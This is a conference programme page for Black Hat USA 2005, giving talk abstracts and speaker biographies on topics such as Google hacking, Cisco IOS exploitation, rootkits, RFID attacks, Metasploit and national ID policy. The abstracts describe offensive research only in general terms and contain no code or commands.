Google Hacking returns for more guaranteed fun this year at Blackhat USA! If you haven’t caught one of Johnny’s Google talks, you definitely should. Come and witness all the new and amazing things that can be done with Google. All new for BH USA 2005, Johnny reveals basic and advanced search techniques, basic and advanced hacking techniques, multi-engine attack query morphing, and zero-packet target foot printing and recon techniques. Check out Google’s search-blocking tactics (and see them bypassed), and learn all about using Google to locate targets Google doesn’t even know about! But wait, there’s more! Act now and Johnny will throw in the all new “Google Hacking Victim Showcase, 2005” loaded with tons of screenshots (and supporting queries) of some of the most unfortunate victims of this fun, addictive and deadly form of Internet nastiness. Think you’re too über to be caught in a Google talk? Fine. Prove your badness. Win the respect of the audience by crushing the live Google Hacking contest! Submit your unique winning query by the end of the talk to win free books from Syngress Publishing and other cool gear! Or don’t. Just listen to your friends rave about it. Whatever.

Johnny Long is a “clean-living” family guy who just so happens to like hacking stuff. Over the past two years, Johnny’s most visible focus has been on this Google hacking “thing” which has served as yet another diversion to a serious (and bill-paying) job as a professional hacker and security researcher for Computer Sciences Corporation. In his spare time, Johnny enjoys making random pirate noises (“Yarrrrr!”), spending time with his wife and kids, convincing others that acting like a kid is part of his job as a parent, feigning artistic ability with programs like Bryce and Photoshop, pushing all the pretty shiny buttons on them new-fangled Mac computers, and making much-too-serious security types either look at him funny or start laughing uncontrollably. Johnny has written or contributed to several books, including “Google Hacking for Penetration Testers” from Syngress Publishing, which has secured rave reviews and has lots of pictures.

Return to the top of the page

Cisco IOS Security Architecture
Michael Lynn

Cisco IOS - the most widely deployed network infrastructure operating system— has been perceived as impervious to remote execution of arbitrary code from stack and heap overflows. Michael Lynn will provide an architectural overview of IOS and explore the feasibility of code execution against Cisco routers. Attendees should have a basic understanding of buffer overflow exploits.

Michael Lynn has an extensive background in embedded systems, including kernel development. His research interests include signals intelligence, cryptography, VoIP, reverse engineering, and any protocol designed by committee. Recently his research focus has been on securing critical routing infrastructures.

Return to the top of the page

SPA: Single Packet Authorization
MadHat Unspecific (Lee Heath), Hacker & Manager, Vernier Threat Labs
Simple Nomad, Hacker, BindView/NMRC

We needed a protocol that allowed us to tell a server that we are who we say we are, have it work across NAT, use TCP, UDP, or ICMP as the transport mechanism, act as an extra layer of security, and be secure itself. Oh, and do so with a single packet. Sound crazy? It's actually very useful. We've come up with a Single Packet Authorization (SPA). This is a protocol for a remote user to send in a request to a server which I cannot be replayed and which uniquely identifies the user. The proof-of-concept code alone is worthy of a presentation itself, but SPA is so much more. This is not port-knowcking (although SPA can easily replace port-knocking with something much more secure).

MadHat leads the DC214, Dallas Defcon Group and is a member of NMRC. His paying gig is as the Manager of Vernier Threat Labs. Before working at Vernier, MadHat was one of the core security team members for Yahoo and leat the vulnerability assessment and day-to-day security monitoring for Yahoo world-wide. He has written several open source security tools and has contributed to an upcoming book on NMap being written by Fyodor.

Simple Nomad is the founder of the Nomad Mobile Research Centre (NMRC), an international group pf hackers that explore technology. By day he works as a Senior Security Analyst for BindView Corporation. He has spent several years developing and testing various computer systems for security strengths. He has authored numerous papers, developed a number of tools for testing the security and insecurity of computer systems, a frequently-sought lecturer at security conferences, and has been quoted in print and television media outlets regarding computer security and privacy.

Return to the top of the page

Long Range RFID and its Security Implications
Kevin Mahaffey, Director of Development, Flexilis
Mark McGovern,
Security Lead, In-Q-Tel
Paul Simmonds, CSO, ICI
Jon Callas, CTO, PGP Corp.

An RFID tagged pallet of expensive electronics was just rerouted to a warehouse where a team of hackers proceed to load it onto a truck. Nobody entered the shipyard. Sound impossible? Not Anymore.  

Long Range RFID will briefly explore the physics and technology behind the operation of RFID systems while highlighting the security issues surrounding widely deployed passive transponders. Our talk will go further to demonstrate custom designed hardware that can perform a denial of service attack against RFID readers and exploit passive transponders from distances never thought possible. We will explore the impact of RFID security issues in both current supply chain usages and the highly criticized deployment of RFID in passports, government-issued identification, currency, and post-supply-chain consumer goods. Finally, we will expand into a panel discussion about the future of RFID policy and security including industry leaders Mark McGovern, security lead for In-Q-Tel, Paul Simmonds, CSO of ICI, and Jon Callas (proposed), CTO of PGP Corporation.

Kevin Mahaffey is the Director of Development for Flexilis, a R&D firm based in Los Angeles, where he researches security issues in current and emerging technologies. He has previously spoken at DefCon 12 regarding the effects of commercial surveillance on American culture. In his spare time, Kevin is pursuing studies in Electrical Engineering at the University of Southern California.

Mark McGovern is a senior analyst with In-Q-Tel and leads their mobility and privacy technology investment programs. Mark has more than 16 years of experience developing and deploying secure systems. He's worked with a variety Fortune 500 clients including Microsoft, MasterCard International, CitiBank, Symantec, CheckFree, the UK National Lottery and the Federal Reserve Banks of Richmond, New York and Boston. Mark began his career as an engineer with the Central Intelligence Agency. As an agency engineer he developed a wide variety of systems to support intelligence activities. In addition to these experiences, Mark has assisted the American Red Cross in designing computer and communications systems to support disaster service efforts. He's adapted submarine technologies for use in "Star Wars" missile defense systems, designed and built equipment for use on NASA's space shuttle, and developed software models to predict intercontinental ballistic missile trajectories. Mark holds a B.S. in Electrical Engineering from Worcester Polytechnic Institute and an M.S. in Systems Engineering from Virginia Polytechnic Institute.

Paul Simmonds joined ICI in 2001 when he was recruited to head up Information Security for ICI, working for the CIO Office in London. Prior to joining ICI he spent a short time with a high security European web hosting company as Head of Information Security, and prior to that seven years with Motorola, again in a global information security role. In his career he has worked with many external agencies, and has also been directly involved in two successful criminal prosecutions, giving evidence in one case.
Paul has a degree in Electronic Engineering and a City & Guilds in Radio Communication. He came to the Information Security field from a background in IT Systems Implementation and consultancy during which he wrote and implemented one of the UK's first web sites. Paul was voted 36th in the 2004 list of the top 50 most powerful people in networking, by the US publication Network World Fusion, for his work with the Jericho Forum.

Jon Callas is currently the CTO of PGP Corporation and has previously served as Chief Scientist at PGP Inc. and as CTO of the Network Security Division for Network Associates Technologies Inc. Jon Callas served as Director of Software Engineering at Counterpane Internet Security Inc. and was a co-architect of Counterpane’s Managed Security Monitoring system. Most recently, he was Senior Systems Architect at Wave Systems Corporation. His career includes work at Digital Equipment Corporation, World Benders, and Apple Computer. He is the principal author of the Internet Engineering Task Force’s (IETF’s) OpenPGP standard and a writer and frequent lecturer on system security and intellectual property issues. Jon Callas has a B.S. in Mathematics from the University of Maryland.

Return to the top of the page

Performing Effective Incident Response  
Kevin Mandia, President, Red Cliff Consulting

During the course of 2004 and 2005, we have responded to dozens of computer security incidents at some of America’s largest organizations. Mr. Mandia was on the front lines assisting these organizations in responding to international computer intrusions, theft of intellectual property, electronic discovery issues, and widespread compromise of sensitive data. Our methods of performing incident response have altered little in the past few years, yet the attacks have greatly increased in sophistication. Mr. Mandia addresses the widening gap between the sophistication of the attacks and the sophistication of the incident response techniques deployed by “best practices.”

During this presentation, Mr. Mandia re-enacts some of the incidents; provides examples of how these incidents impacted organizations; and discusses the challenges that each organization faced. He demonstrates the “state-of-the-art” methods being used to perform Incident Response, and how these methods are not evolving at a pace equal to the threats. He outlines the need for new technologies to address these challenges, and what these technologies would offer. He concludes the presentation by discussing emerging trends and technologies that offer strategic approaches to minimize the risks that an organization faces from the liabilities the information age has brought.

Kevin Mandia is an internationally recognized expert in the field of information security. He has been involved with information security for over fifteen years, beginning in the military as a computer security officer at the Pentagon. He has assisted attorneys, corporations, and government organizations with matters involving information security compliance, complex litigation support, computer forensics, expert testimony, network attack and penetration testing, fraud investigations, computer security incident response, and counterintelligence matters. Mr. Mandia established Red Cliff specifically to bring together a core group of industry leaders in this field and solve client’s most difficult information security challenges.

Prior to forming Red Cliff, Kevin built the computer forensics and investigations group at Foundstone from its infancy to a multi-million dollar global practice that performed civil litigation support and incident response services. As technical and investigative lead, Mr. Mandia responded on-site to dozens of computer security incidents per year. He assisted numerous financial services and large organizations in handling and discretely resolving computer security incidents. He also led Foundstone’s computer forensic examiners in supporting numerous criminal and civil cases. He has provided expert testimony on matters involving theft of intellectual property and international computer intrusion cases.

Return to the top of the page

NX: How Well Does It Say NO to Attacker’s eXecution Attempts?  
David Maynor, Research Engineer, ISS X-Force R&D, Internet Security Systems

NX. It’s known by different names to different people. AMD calls it Enhanced Virus Protection, or EVP. Microsoft calls its support Data Execution Prevention, or DEP. After the press about how this new technology will stop hackers and worms in their tracks, many people call it a modern marvel. But this new technology has several layers of confusion surrounding it in regards to where it is implemented, how it protects and even when its on. This talk will unwrap the information while showing that at best NX is a speed bump and not a stop sign to malicious intruders.

David Maynor is a research engineer with the ISS Xforce R&D team where his primary responsibilities include reverse engineering high risk applications, researching new evasion techniques for security tools, and researching new threats before they become widespread. Before ISS Maynor spent the 3 years at Georgia Institute of Technology (GaTech), with the last two years as a part of the information security group as an application developer to help make the sheer size and magnitude of security incidents on campus manageable. Before that Maynor contracted with a variety of different companies in a widespread of industries ranging from digital TV development to protection of top 25 websites to security consulting and penetration testing to online banking and ISPs.

Return to the top of the page

The Non-Cryptographic Ways of Losing Information 
Robert Morris, former chief scientist, NSA

To fully understand how to protect crucial information in the modern world, one needs to fully understand how the modern spy steals it. Since the glorious days of cryptanalysis during World War II, the art of stealing and protecting information has drastically changed. Using over 25 years of NSA field-stories, this talk will highlight the lesser-known world of stealing data: eavesdropping, theft, purchase, burglary, blackmail, bribery, and the like. Furthermore, my talk will highlight ways one can avoid the common pitfalls of carelessness and overconfidence that give the modern spy a full access pass.

Robert Morris received a B.A. in Mathematics from Harvard University in 1957 and a M.A. in Mathematics from Harvard in 1958. He was a member of the technical staff in the research department of Bell Laboratories from 1960 until 1986. On his retirement from Bell Laboratories in 1986 he began work at the National Security Agency. From 1986 to his (second) retirement in 1994, he was a senior adviser in the portion of NSA responsible for the protection of sensitive U.S. information.

Return to the top of the page

The National ID Debate 
Moderator: David Mortman, CISO, Siebel Systems
Dennis Bailey,
COO, Comter Systems and author of "The Open Society Paradox"
Jim Harper,
Director Information Policy Studies, The Cato Institute
Rhonda E. MacLean, Charter Member, Global Chief Security Officer Council

As a result of the Real-ID Act, all American citizens will have an electronically readable ID card that is linked to the federal database by May 2008. This means that in three years we will have a National ID card system that is being unilaterally controlled by one organization (DHS) whether we want it or not. Organizations such as the ACLU are already exploring opportunities for litigation. Privacy advocates cite Nazi Germany and slippery slopes, while the government waves the anti-terrorism flag back in their faces. Compromises and alternate solutions abound.

Join us for a lively debate/open forum as an attempt to find a useable solution to this sticky problem. We will review solutions from the AMANA as well as ask why passports are not considered to be a privacy problem in the same ways. Would a National ID card make us safer? What to do about 15 million illegal immigrants? If college students can fake an ID, why can't a terrorist? What civil rights are abrogated by requiring everyone to possess an ID? What problem are we trying to solve anyway and will federal preemption address them?

David Mortman, Chief Information Security Officer for Siebel Systems, Inc., and his team are responsible for Siebel Systems' worldwide IT security infrastructure, both internal and external. He also works closely with Siebel's product groups and the company's physical security team and is leading up Siebel's product security and privacy efforts. Previously, Mr. Mortman was Manager of IT Security at Network Associates, where, in addition to managing data security, he deployed and tested all of NAI's security products before they were released to customers. Before that, Mortman was a Security Engineer for Swiss Bank. A CISSP, member of USENIX/SAGE and ISSA, and an invited speaker at RSA 2002 and 2005 security conferences, Mr. Mortman has also been a panelist at InfoSecurity 2003 and Blackhat 2004. He holds a BS in Chemistry from the University of Chicago.

Dennis Bailey is the Chief Operating Officer for Comter Systems, a top-secret, 8(a) information technology and management consulting firm based out of Fairfax, Virginia. He is also the author of "The Open Society Paradox: Why the Twenty-First Century Calls for More Openness Not Less", a recently published book which makes the case for secure identification and information sharing. He is active in the fields of identification, information sharing and security. He was a participant in the Sub-group on Identification for the Markle Foundation Task Force on Terrorism. He participates on the ITAA's Identity Management Task Group and is a member of the Coalition for a Secure Driver's License. His education includes a master's degree in political science from American University, where he worked at the Center for Congressional and Presidential Studies. Dennis also has a master's degree in psychology from the University of Dayton, where he worked at the Social Science Research Center.

Jim Harper: As director of information policy studies, Jim Harper speaks, writes, and advocates on issues at the intersection of business, technology, and public policy. His work focuses on the difficult problems of adapting law and policy to the unique problems of the information age. Jim is also the editor of, a Web-based think-tank devoted exclusively to privacy. He is a member of the Department of Homeland Security's Data Privacy and Integrity Advisory Committee. In addition to giving dozens of speeches and participating in panel discussions and debates nationwide, Jim's work has been quoted and cited by USA Today, the Associated Press, and Reuters, to name a few. He has appeared on numerous radio programs and on television, commenting for Fox News, CBS News, and MSNBC. Jim is a native of California and a member of the California bar. He earned his bachelor's degree in political science at the University of California, Santa Barbara, where he focused on American politics and the federal courts. At Hastings College of the Law, Jim served as editor-in-chief of the Hastings Constitutional Law Quarterly. In addition to numerous writings and ghost-writings in the trades and popular press, his scholarly articles have appeared in the Administrative Law Review, the Minnesota Law Review, and the Hastings Constitutional Law Quarterly.

Rhonda E. MacLean is a charter member of the Global Council of Chief Security Officers.  The Council is a think tank comprised of a group of influential corporate, government and academic security experts dedicated to encouraging dialogue and action to meet the new challenges of global online security. 

MacLean provided leadership as the Global Chief Information Security Officer for Bank of America from 1996 until 2005. At Bank of America she was responsible for company-wide information security policies and procedures, support for the lines of business in their management of information risk, implementation of security technology, cyber forensics and investigations, and awareness for the company’s leadership, associate base and outside suppliers. In that role she provided leadership for a number of company-wide initiatives designed to protect sensitive customer and company information. In addition, under her leadership the bank’s corporate information security organization has been a leader in innovation, filing for numerous U.S. Patents in the areas of infrastructure risk management and information security.

After many years of service on some of the industry’s most important associations, advisory boards and think tanks, she was appointed in 2002 by the Secretary of the Treasury to serve as the financial services sector coordinator for critical infrastructure protection and homeland security. In that role, she established a Limited Liability Corporation which brought together 26 financial service trade associations, utilities and professional institutes to work in partnership with Treasury to create several important industry initiatives designed to ensure industry cooperation and resiliency. She continues to serve as Chairman Emeritus for the Council. 

In September 2003, The Executive Women’s Forum named MacLean one of five “Women of Vision”, one of the top business leaders shaping the information security industry. MacLean was named one of the 50 most powerful people in the network industry in NetworkWorld’s 2003 and 2004 issues. In recognition of her continued leadership in the security field, she was awarded CSO’s Compass Award in 2005. In April 2005, The Friends of a Child’s Place, a Charlotte-based advocacy for the homeless, named her one of the “First Ladies of Charlotte” in recognition of her pioneering role in information security and her support for the Charlotte community.

MacLean has spent more than 25 years in the information technology industry. Immediately before joining Bank of America, MacLean spent 14 years at The Boeing Company where she was the Senior Information Security Manager for Boeing’s proprietary and government programs. She is certified by the Information Systems Audit and Control Association as a Certified Information Security Manager.

Return to the top of the page

CISO Q&A with Jeff Moss
Scott Blake, Liberty Mutual
Pamela Fusco, Merck
Andre Gold, Continental Airlines
Ken Pfeil, Capital IQ
Justin Somaini, Verisign

Jeff Moss, founder of Black Hat, invites Chief Information Security Officers from global corporations to join him on stage for a unique set of questions and answers. What do CISOs think of Black Hat, David Litchfield, Dan Kaminsky, Joe Grand, Johnny Long, Metasploit, and DEFCON? How many years before deperimeterization is a reality? Is security research more helpful or harmful to the economy? What privacy practices do CISOs personally use? These questions and others from the audience will be fielded by this panel of security visionaries.

Scott Blake is Chief Information Security Officer for Liberty Mutual Insurance Group and is responsible for information security strategy and policy. Prior to joining Liberty, Scott was Vice President of Information Security for BindView Corporation where he founded the RAZOR security research team and directed security technology, market, and public affairs strategy. Scott has delivered many lectures on all aspects of information security and is frequently sought by the press for expert commentary. Since 1993, Scott has also worked as a security consultant, IT director, and network engineer. He holds an MA in Sociology from Brandeis University, a BA in Social Sciences from Simon's Rock College, and holds the CISM and CISSP security certifications.

Pamela Fusco, CISSP, CISM, CHS-III, Chief Security Officer, Merck & Co., Inc.
Pamela Fusco is an Executive Global Information Security Professional, for Merck & CO., Inc. She has accumulated over 19 years of substantial experience within the Security Industry. Her extensive background and expertise expand globally encompassing all facets of security inclusive of logical, physical, personal, facilities, systems, networks, wireless, and forensic investigations. Presently she leads a talented team of Compliance, Systems and Information Security Engineers operating a world-wide 24X7X365 SIRT (security incident response team).

Andre Gold is currently Director of Information Security at Continental Airlines, one of the world's largest and most successful commercial and freight transportation providers. Before assuming his current role, Mr. Gold served as Technical Director of Internet Services, responsible for Continental's property, which contributes over a billion dollars a year in revenue for Continental. Prior to Continental Airlines, Inc. Mr. Gold worked as a consultant in the IT industry. Mr. Gold has a BBA in Computer Information Systems from the University of Houston-Downtown and received his commission in the Army from Wentworth Military Academy. In addition to his position at Continental, Mr. Gold servers on the Microsoft Chief Security Officer Council, the Skyteam Data Privacy and Security Subcommittee, as well as eEye Digital Security's Executive Advisory Council.

Ken Pfeil is CSO at Capital IQ, a web-based information service company headquartered in New York City. His experience spans over two decades with companies such as Microsoft, Dell, Avaya, Identix, and Merrill Lynch. Ken is coauthor of the books "Hack Proofing Your Network - 2nd Edition" and "Stealing the Network - How to Own the Box," and a contributing author of "Security Planning and Disaster Recovery" and "Network Security – The Complete Reference."

Justin Somaini is Director of Information Security at VeriSign Inc. where he is responsible for managing all aspects of network and information security for VeriSign. With over 10 years of Information Security and Corporate Audit experience, Justin has leveraged his knowledge of audit and large organizations to remediate global infrastructure problems and create a full risk identification and remediation Information Security group. Previously, Justin was the Director of Information Security Services for Charles Schwab Inc., where he was responsible for all aspects of Information Security Operations. Before that he was a Manager with PricewaterhouseCoopers LLP where he spent several years developing their attack and penetration leadership and audit practice.

Return to the top of the page

Owning the C-suite: Corporate Warfare as a Social Engineering Problem 
Shawn Moyer, CISSP, Lead Security Product Manager, unnamed Fortune 100

Let's face it, you ROCK at building InfoSec tech, but you SUCK at corporate warfare. Sooner or later, you WILL have to sit in a boardroom with the suits and justify your existence. If you approach your own survival and that of your security team's as a Social Engineering problem, it can not only work for you, but it can be FUN. Don't let them own you, own THEM.

Shawn Moyer is a Lead Security Product Manager for InfoSec for one of the US's largest finance companies. He has lots of three and four letter acronyms after his name, and has led InfoSec teams at startups and smaller companies in the past. He has spent much of his career getting people who hate security to love it, and finding ways to get non-geeky people to see why they need geeks. He has been attending BH and DC for quite a few years, but has managed to keep his mouth shut until now.

Return to the top of the page

Economics, Physics, Psychology and How They Relate to Technical Aspects of Counter Intelligence/Counter Espionage Within Information Security
Mudge aka Peiter Mudge Zatko, Division Scientist, BBN Technologies

The computer and network security fields have made little progress in the past decade. The rhetoric that the field is in an arms race; attacks are becoming more complicated and thus defenses are always in a keep-up situation makes little sense when 10 year old root kits, BGP and DNS attacks that have been widely publicized for years, and plain-text communications streams are still being taken advantage of. This talk looks at the environment without being skewed by currently marketed solutions. It then presents corollaries for environments in different disciplines, such as economics and physics, talks to certain psychological situations that prohibit researchers and organizations from being able to correctly address the problems, maps these solutions into Counter Intelligence and Counter Espionage models and finally applies them to low level network and systems communications. This presentation involves audience participation to point out ways of breaking the helplessness cycle (for the defensive side) or to better target areas for exploitation (for the offensive side).

"Mudge" - Peiter Mudge Zatko
Better known as Mudge, the hacker who testified to the Senate that he could "take the Internet down in 30 minutes", Zatko has been a pioneer of the commercial information security and warfare sector since the 1980s. The leader of the hacker think-tank "L0pht", he founded @stake and Intrusic and currently works as a Division Scientist for BBN Technologies (the company that designed and built the Internet).

Mudge is the creator of L0phtCrack - the premier MS password auditor, SLINT - the first source code vulnerability auditing system, AntiSniff - the first commercial promiscuous system network detection tool, and Zephon - Intrusic's flagship product focused on Counter Intelligence / Counter Espionage for corporate Insider-Threat. His other software works are now included in several distributions of commercial and public domain operating systems.

As a lecturer and advisor Mudge has contributed to the CIA's critical National security mission, was recognized as a vital contributor to the success of the President's Scholarship for Service Program by the NSC, has briefed Senators, the former Vice President and President of the United States, and has provided testimony to the US Senate multiple times.

An honorary plank owner of the USS McCampbell and referenced as part of 'U.S. History' in Trivial Pursuit, his mission remains constant to "make a dent in the universe".

Return to the top of the page

The Art of SIP fuzzing and Vulnerabilities Found in VoIP
Ejovi Nuwere, Founder, SecurityLab Technologies
Mikko Varpiola,
Head, Test Toll Development, Codenomicon

This presentation will cover SIP and VoIP related automated fuzzing techniques. Using real world vulnerabilities and audit engagements we will give a technical understanding of this emerging technology and its common attack vectors.

The techniques discussed in this talk will not only be limited to SIP but will apply to methodical audit approaches for fuzzing text based protocols which can be more complex then fuzzing binary protocols.

This talk will include:

  • 0 day vulnerabilities (or one day)
  • Example fuzzing scripts
  • Proof of concept code

Ejovi Nuwere is the founder of SecurityLab Technologies. Nuwere gained media attention and international recognition for his highly publicized security audit of Japan's National ID system--JukiNet. Nuwere is the Chief Technology Officer of SecurityLab Technologies where he heads the companies VoIP security auditing group. He currently lives in Boston and is working on his second book, Practical Penetration Testing (O'Reilly).

Mikko Varpiola is the head of test tool development at Codenomicon. His specific area of expertise is in anomaly design - e.g. what to feed into software to make it fail. Before Codenomicon he worked as a researcher in the acclaimed PROTOS project at Oulu University Secure Programming Group (OUSPG).

Return to the top of the page

[ Back-up Speaker ]
Stopping Automated Application Tools and their Attacks

Gunter Ollmann, Professional Services Director, Next Generation Security Software Limited

Relying on client-side scripting as a positive security mechanism has been generally regarded as not a particularly smart idea—after all, it can be bypassed the attacker. Unfortunately this is an outdated view—with a little understanding, client-side code can be turned into an effective weapon capable of combating the latest generation of application assessment tools and most automated attack vectors.

This talk covers the methods application developers and security departments have at heir disposal to halt (and sometimes break) an attack being conducted by an automated tool or script—whether the attack be initiated from a single host, or a distributed network.

Gunter Ollmann is the Professional Services Director at NGSSoftware—the world’s most renowned security vulnerability research company. Focusing upon web application security and penetration testing, and having previously been the EMEA head of X-Force Security Assessment Services for ISS, he balances his time between security consulting from an attack perspective, business development and researching into next generation attack vectors. 

Gunter is a frequent security contributor with over twenty key technical whitepapers published in the last 4 years on topics ranging from URL encoded attacks through to wireless security and second-order code injection.  His authoritative paper on phishing—“The Phishing Guide”—was voted one of the top technical whitepapers of 2004.

A frequently invited speaker, over the years Gunter has presented to conference audiences including the UK Ministry of Defence, GCHQ, InfoSec, Compsec, OWASP, and many more. He has written security articles and provided expert comment for many of the top security and computing magazines, as well as writing his own column “Consultants Corner” in SC Magazine for the last few years.

Return to the top of the page

Injection Flaws: Stop Validating Your Input
Mike Pomraning, CISSP, Project Manager, Infrastructure, SecurePipe, Inc.

Years after the debut of XSS and SQL Injection, each passing week sees newly disclosed vulnerabilities ready to be exploited by these same techniques. Labelling all of these as "input validation flaws" isn't helping anymore. In this Turbo Talk we turn the situation upside-down to get a better perspective, and cover specific techniques to address the problems.

Mike Pomraning is a systems and process troubleshooter, finding trouble and shooting it. He works for SecurePipe, Inc., a managed security services provider, and holds a CISSP. He prefers to debug application misbehavior with code traces, kernel traces and packet dumps, though at higher layers he prefers dialogue and audit. Along the way has written a few helpful programs, including pynids, a python wrapper to the libnids NIDS framework, and more perl than he can recall.

Return to the top of the page

Automation - Deus ex Machina or Rube Goldberg Machine?

How far can automation be taken? How much intelligence can be embodied in code? How generic can automated IT security assessment tools really be? This presentation will attempt to show which areas of attacks lend themselves to automation and which aspects should best be left for manual human inspection and analyses.

SensePost will provide the audience a glimpse of BiDiBLAH - an attempt to automate a focussed yet comprehensive assessment. The tool provides automation for:

  • Finding networks and targets
  • Fingerprinting targets
  • Discovering known vulnerabilities on the targets
  • Exploiting the vulnerabilities found
  • Reporting

Roelof Temmingh is the Technical Director of SensePost where his primary function is that of external penetration specialist. Roelof is internationally recognized for his skills in the assessment of web servers. He has written various pieces of PERL code as proof of concept for known vulnerabilities, and coded the world-first anti-IDS web proxy "Pudding". He has spoken at many International Conferences and in the past year alone has been a keynote speaker at SummerCon (Holland) and a speaker at The Black Hat Briefings. Roelof drinks tea and smokes Camels.

Haroon Meer is currently SensePost's Director of Development (and coffee drinking). He specializes in the research and development of new tools and techniques for network penetration and has released several tools, utilities and white-papers to the security community. He has been a guest speaker at many Security forums including the Black Hat Briefings. Haroon doesnt drink tea or smoke camels.

Charl van der Walt is a founder member of SensePost. He studied Computer Science at UNISA, Mathematics at the University of Heidelberg in Germany and has a Diploma in Information Security from the Rand Afrikaans University. He is an accredited BS7799 Lead Auditor with the British Institute of Standards in London. Charl has a number of years experience in Information Security and has been involved in a number of prestigious security projects in Africa, Asia and Europe. He is a regular speaker at seminars and conferences nationwide and is regularly published on internationally recognized forums like SecurityFocus. Charl has a dog called Fish.

Return to the top of the page

The Jericho Challenge - Finalist Architecture Presentations and Awards
Paul Simmonds, CISO of ICI and Executive Director, the Jericho Forum

The days of the corporate network, completely isolated with a well-secured outer shell are long gone; yet we continue to cling to this model. Global networks with no borders, offer the potential of substantial savings in communications costs, maximum network agility and instant connectivity for clients and partners.

Can you secure this incredibly compelling business model, and provide a long-term business case for security where security contributes to the corporate bottom line? Can the CISO be seen as a true partner in corporate strategic thinking? What does business need from its suppliers to make this a feasible reality? What do you need to be doing now to achieve this goal?

The Jericho Challenge is an industry-wide competition with for secure architecture design and related Jericho compliancy concepts, available at The top three finalists will present their papers during this session. Judges will give cash awards to papers that contribute most to the debate on Jericho Architecture. Contact for entrance rules and regulations.

Paul Simmonds joined ICI in 2001 when he was recruited to head up Information Security for ICI, working for the CIO Office in London.

Prior to joining ICI he spent a short time with a high security European web hosting company as Head of Information Security, and before that seven years with Motorola, again in a global information security role. Paul is also a founding member of the Jericho Forum, a pan-global grouping of corporate companies working to define the issues and benefits of operating in a deperimiterised environment.

In his career he has worked with many external agencies, including the FBI, Scotland Yard, Wiltshire Computer Crime and Wiltshire Child protection. He has also been directly involved in two successful criminal prosecutions, giving evidence in one case.

Paul has a degree in Electronic Engineering and a City & Guilds in Radio Communication and is also a qualified kayak coach. He came to the Information Security field from a background in IT Systems Implementation and consultancy during which he wrote and implemented one of the UK's first web sites.

He is married with three children and a very understanding wife and in the little spare time that he has teaches canoeing and runs charity radio stations.

Return to the top of the page

Windows Internals: Understanding Security Changes in Windows XP Service Pack 2
Window Snyder, Senior Security Strategist, Microsoft

This session demonstrates previously unreleased detail around the broad scope of the changes in Windows XP Service Pack 2 (SP2). This includes the most relevant security mitigations, the Windows ship process, and a change in how Microsoft communicates details to the security community. This session also gives detail for what changed in Windows Server 2003 Service Pack 1 and why you need to start planning to deploy immediately.

Window Snyder is a Senior Security Strategist at Microsoft in the Security Engineering and Communications organization. She manages the outreach strategy for security researchers and security vendors. Previously she was responsible for security sign-off for Windows XP SP2 and Windows Server 2003.

Prior to joining Microsoft, Ms. Snyder was Director of Security Architecture at @stake. She developed application security analysis methodologies and led the Application Security Center of Excellence. She was a software engineer for 5 years focused primarily on security applications, most recently at Axent Technologies, now Symantec.

Ms. Snyder is co-author of "Threat Modeling", a manual for security architecture analysis in software.

Return to the top of the page

eEye BootRoot
Derek Soeder, Software Engineer, eEye Digital
Ryan Permeh, Senior Software Engineer, eEye Digital Security

This presentation will cover the eEye BootRoot project, an exploration of technology that boot sector code can use to subvert the Windows NT-family kernel and retain the potential for execution, even after Windows startup—a topic made apropos by the recent emergence of Windows rootkits into mainstream awareness. We will provide some brief but technical background on the Windows startup process, then discuss BootRoot and related technology, including a little-known stealth technique for low-level disk access. Finally, we will demonstrate the proof-of-concept BootRootKit, loaded from a variety of bootable media.

Derek Soeder is a Software Engineer and after-hours researcher at eEye Digital Security. In addition to participating in the ongoing development of eEye's Retina Network Security Scanner product, Derek has also produced a number of internal technologies and is responsible for the discovery of multiple serious security vulnerabilities. His main areas of interest include operating system internals and machine code-level manipulation.

Ryan Permeh is a Senior Software Engineer at eEye Digital Security. He focuses mainly on the Retina and SecureIIS product lines. He has worked in the porting of nmap and libnet to Windows, as well as helping with disassembly and reverse engineering, and exploitation efforts within the eEye research team.

Return to the top of the page

“Shadow Walker” — Raising The Bar For Rootkit Detection
Sherri Sparks
Jamie Butler,
Director of Engineering, HB Gary

Last year at Black Hat, we introduced the rootkit FU. FU took an unprecented approach to hiding not previously seen before in a Windows rootkit. Rather than patching code or modifying function pointers in well known operating system structures like the system call table, FU demonstrated that is was possible to control the execution path indirectly by modifying private kernel objects in memory. This technique was coined DKOM, or Direct Kernel Object Manipulation. The difficulty in detecting this form of attack caused concern for anti-malware developers. This year, FU teams up with Shadow Walker to raise the bar for rootkit detectors once again. In this talk we will explore the idea of memory subversion. We demonstrate that is not only possible to hide a rootkit driver in memory, but that it is possible to do so with a minimal performance impact. The application (threat) of this attack extends beyond rootkits. As bug hunters turn toward kernel level exploits, we can extrapolate its application to worms and other forms of malware. Memory scanners beware the axiom, ‘vidre est credere’ . Let us just say that it does not hold the same way that it used to.

Sherri Sparks is a PhD student at the University of Central Florida. She received her undergraduate degree in Computer Engineering and subsequently switched to Computer Science after developing an interest in reverse code engineering and computer security. She also holds a graduate certificate in Computer Forensics. Currently, her research interests include offensive / defensive malicious code technologies and related issues in digital forensic applications.

Jamie Butler is the Director of Engineering at HBGary, Inc. specializing in rootkits and other subversive technologies. He is the co-author and a teacher of "Aspects of Offensive Rootkit Technologies" and co-author of the upcoming book "Rootkits: Subverting the Windows Kernel" due out late July. Prior to accepting the position at HBGary, he was a senior developer on the Windows Host Sensor at Enterasys Networks, Inc. and a computer scientist at the NSA. He holds a MS in CS from UMBC and has published articles in the IEEE IA Workshop proceedings, Phrack, USENIX login, and Information Management and Computer Security. Over the past few years his focus has been on Windows servers concentrating in host based intrusion detection and prevention, buffer overflows, and reverse engineering. Jamie is also a contributor at

Return to the top of the page

Beyond EIP
spoonm & skape

When we built Metasploit, our focus was on the exploit development process. We tried to design a system that helped create reliable and robust exploits. While this is obviously very important, it's only the first step in the process. What do you do once you own EIP? Our presentation will concentrate on the recent advancements in shellcode, IDS/firewall evasion, and post-exploitation systems. We will discuss the design and implementation of the technologies that enable complex payloads, such as VNC injection, and the suite of tools we've built upon them. We will then present a glimps of the next generation of Metasploit, and how these new advances will serve as it's backbone.

Since late 2003, spoonm has been one of the core developers behind the Metasploit Project. He is responsible for much of the architecture in version 2.0, as well as other components including encoders, nop generators, and a polymorphic shellcode engine. A full-time student at a northern university, spoonm spends too much of his free time on security research projects.

Skape is a lead software developer by day and an independent security researcher by night. He joined forces with the Metasploit project in 2004 where his many contributions have included the Meterpreter, VNC injection, and many other payload advances. Skape has worked on a number of open-source projects and has authored several papers on security related technologies. His current security related interests include post-exploitation technologies, payload development and optimization, and exploitation prevention technology.

Return to the top of the page

